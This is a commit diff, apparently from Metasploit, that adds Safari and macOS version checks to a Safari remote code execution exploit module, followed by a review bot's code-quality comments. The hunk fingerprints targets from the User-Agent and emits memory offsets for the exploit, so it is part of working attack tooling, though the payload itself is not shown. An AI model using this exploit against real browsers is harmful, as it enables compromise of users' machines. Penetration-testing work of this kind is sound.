Land #11347, add version check to Safari RCE exploit
parent
b016447ea6
commit
99cc417a5c
|
@ -98,14 +98,22 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def get_offsets(user_agent)
|
||||
if user_agent =~ /Intel Mac OS X (.*?)\)/
|
||||
version = $1.gsub("_", ".")
|
||||
mac_osx_version = Gem::Version.new(version)
|
||||
osx_version = $1.gsub("_", ".")
|
||||
if user_agent =~ /Version\/(.*?) /
|
||||
if Gem::Version.new($1) >= Gem::Version.new('11.1.1')
|
||||
print_warning "Safari version #{$1} is not vulnerable"
|
||||
return false
|
||||
else
|
||||
print_good "Safari version #{$1} appears to be vulnerable"
|
||||
end
|
||||
end
|
||||
mac_osx_version = Gem::Version.new(osx_version)
|
||||
if mac_osx_version >= Gem::Version.new('10.13.4')
|
||||
print_warning "macOS version #{mac_osx_version} is not vulnerable"
|
||||
elsif mac_osx_version < Gem::Version.new('10.12')
|
||||
print_warning "macOS version #{mac_osx_version} is not vulnerable"
|
||||
elsif offset_table.key?(version)
|
||||
offset = offset_table[version]
|
||||
elsif offset_table.key?(osx_version)
|
||||
offset = offset_table[osx_version]
|
||||
return <<-EOF
|
||||
const JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};
|
||||
const DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};
|
||||
|
|
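Review bot: The new Safari check passes the `Version/` token from the client-supplied User-Agent straight to `Gem::Version.new($1)`, which raises `ArgumentError` on a malformed version string, so an odd header would surface as an exception from `get_offsets` unless a caller outside this hunk rescues it. Capturing the token once and validating it first would avoid that, and would also remove the repeated `$1` reads: `safari_version = Regexp.last_match(1)` followed by `return false unless Gem::Version.correct?(safari_version)`. The same applies to `Gem::Version.new(osx_version)` a few lines further down. Separately, only the Safari branch does `return false`; the two macOS "is not vulnerable" branches warn and then fall through to code that is not visible here, so the return contract of `get_offsets` should be made consistent and stated in a comment above the `def`. The method body continues past the end of the hunk.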